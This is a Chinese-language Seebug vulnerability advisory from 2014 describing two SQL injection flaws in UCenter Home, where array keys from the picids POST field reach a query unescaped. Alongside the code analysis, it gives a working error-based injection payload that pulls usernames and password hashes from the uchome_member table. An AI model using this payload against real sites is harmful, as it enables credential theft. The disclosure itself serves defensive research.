Ucenter Home最新版SQL注入两处

2014-07-25T00:00:00
ID SSV:93584
Type seebug
Reporter Root
Modified 2014-07-25T00:00:00

Description

简要描述:

Ucenter Home最新版SQL注入两处,比较隐蔽

详细说明:

在编辑日志处 文件cp_blog.php:

``` //添加编辑操作 if(submitcheck('blogsubmit')) { if(empty($blog['blogid'])) { $blog = array(); } else { if(!checkperm('allowblog')) { ckspacelog(); showmessage('no_authority_to_add_log'); } }

//验证码
if(checkperm('seccode') && !ckseccode($_POST['seccode'])) {
    showmessage('incorrect_code');
}

include_once(S_ROOT.'./source/function_blog.php');
if($newblog = blog_post($_POST, $blog)) {
    if(empty($blog) && $newblog['topicid']) {
        $url = 'space.php?do=topic&topicid='.$newblog['topicid'].'&view=blog';
    } else {
        $url = 'space.php?uid='.$newblog['uid'].'&do=blog&id='.$newblog['blogid'];
    }
    showmessage('do_success', $url, 0);
} else {
    showmessage('that_should_at_least_write_things');
}

} ```

注意这里的$newblog = blog_post($_POST, $blog) 更新内容应该是在blog_post函数,跟进。 文件function_blof.php:

``` //添加博客 function blog_post($POST, $olds=array()) { global $_SGLOBAL, $_SC, $space;

//操作者角色切换
$isself = 1;
if(!empty($olds['uid']) && $olds['uid'] != $_SGLOBAL['supe_uid']) {
    $isself = 0;
    $__SGLOBAL = $_SGLOBAL;
    $_SGLOBAL['supe_uid'] = $olds['uid'];
    $_SGLOBAL['supe_username'] = addslashes($olds['username']);
}

...... //获取上传的图片 $uploads = array(); if(!empty($POST['picids'])) { $picids = array_keys($POST['picids']); print_r($picids); $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'"); while ($value = $_SGLOBAL['db']->fetch_array($query)) { if(empty($titlepic) && $value['thumb']) { $titlepic = $value['filepath'].'.thumb.jpg'; $blogarr['picflag'] = $value['remote']?2:1; } $uploads[$POST['picids'][$value['picid']]] = $value; } if(empty($titlepic) && $value) { $titlepic = $value['filepath']; $blogarr['picflag'] = $value['remote']?2:1; } } ```

在获取上传图片时,看这里的关键代码:

$picids = array_keys($POST['picids']); $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");

$picids = array_keys($POST['picids']),获取了picids的数组的全部键值 然后picdis进入了SQL,这里导致了SQL注入。 第二处SQL注入 文件cp_thread.php

``` if(submitcheck('threadsubmit')) { $tid = $_POST['tid'] = intval($_POST['tid']); $tagid = empty($_POST['tagid'])?0:intval($_POST['tagid']);

if($eventid && $event['tagid']!=$tagid) {
    showmessage('event_mtag_not_match');
}
......//省略
//获取上传的图片
$uploads = array();
if(!empty($_POST['picids'])) {
    $picids = array_keys($_POST['picids']);
    $query = $_SGLOBAL['db']->query("SELECT * FROM ".tname('pic')." WHERE picid IN (".simplode($picids).") AND uid='$_SGLOBAL[supe_uid]'");
    while ($value = $_SGLOBAL['db']->fetch_array($query)) {
        if(empty($titlepic) && $value['thumb']) {
            $titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']);
        }
        $uploads[$_POST['picids'][$value['picid']]] = $value;
    }
    if(empty($titlepic) && $value) {
        $titlepic = pic_get($value['filepath'], $value['thumb'], $value['remote']);
    }
}

```

通用先获取了$_POST['picids']的值,然后直接进入了SQL语句,导致SQL注入 漏洞证明同第一处SQL注入。

漏洞证明:

1、发表一篇日志 2、编辑日志 3、在编辑日志是,上传图片:

<img src="https://images.seebug.org/upload/201407/251626036960fe495f3972916aa18f8cf98eb054.png" alt="666.png" width="600" onerror="javascript:errimg(this);">

4、然后保存是,抓包,修改POST数据: 修改picids[3]为:

picids[3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#]"

<img src="https://images.seebug.org/upload/201407/25163540977ca97652931857ff7ba66558a39547.png" alt="777.png" width="600" onerror="javascript:errimg(this);">

最后执行的sql语句为:

SELECT * FROM uchome_pic WHERE picid IN ('3',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b))#','4') AND uid='2'

然后看返回:

<img src="https://images.seebug.org/upload/201407/2516355339bb38aa79954fe6c11cf552c51d9a1f.png" alt="888.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201407/2516372696e622bb8284032a4c11f031b14fcc4e.png" alt="888-1.png" width="600" onerror="javascript:errimg(this);">